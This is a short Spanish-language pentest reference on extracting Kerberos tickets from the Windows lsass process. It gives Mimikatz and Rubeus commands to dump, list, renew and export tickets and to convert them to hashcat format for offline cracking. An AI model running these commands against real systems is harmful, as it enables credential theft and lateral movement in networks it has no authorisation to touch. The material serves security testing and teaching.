Los tickets en Windows son gestionados y almacenados por el proceso lsass (Servicio de Subsistema de Autoridad de Seguridad Local), responsable de manejar las políticas de seguridad. Para extraer estos tickets, es necesario interactuar con el proceso lsass. Un usuario no administrativo solo puede acceder a sus propios tickets, mientras que un administrador tiene el privilegio de extraer todos los tickets en el sistema. Para tales operaciones, las herramientas Mimikatz y Rubeus son ampliamente utilizadas, cada una ofreciendo diferentes comandos y funcionalidades.

Mimikatz

Mimikatz es una herramienta versátil que puede interactuar con la seguridad de Windows. Se utiliza no solo para extraer tickets, sino también para diversas operaciones relacionadas con la seguridad.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus es una herramienta diseñada específicamente para la interacción y manipulación de Kerberos. Se utiliza para la extracción y gestión de tickets, así como para otras actividades relacionadas con Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Cuando uses estos comandos, asegúrate de reemplazar los marcadores de posición como <BASE64_TICKET> y <luid> con el ticket codificado en Base64 y el ID de inicio de sesión real, respectivamente. Estas herramientas proporcionan una funcionalidad extensa para gestionar tickets e interactuar con los mecanismos de seguridad de Windows.

Referencias

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/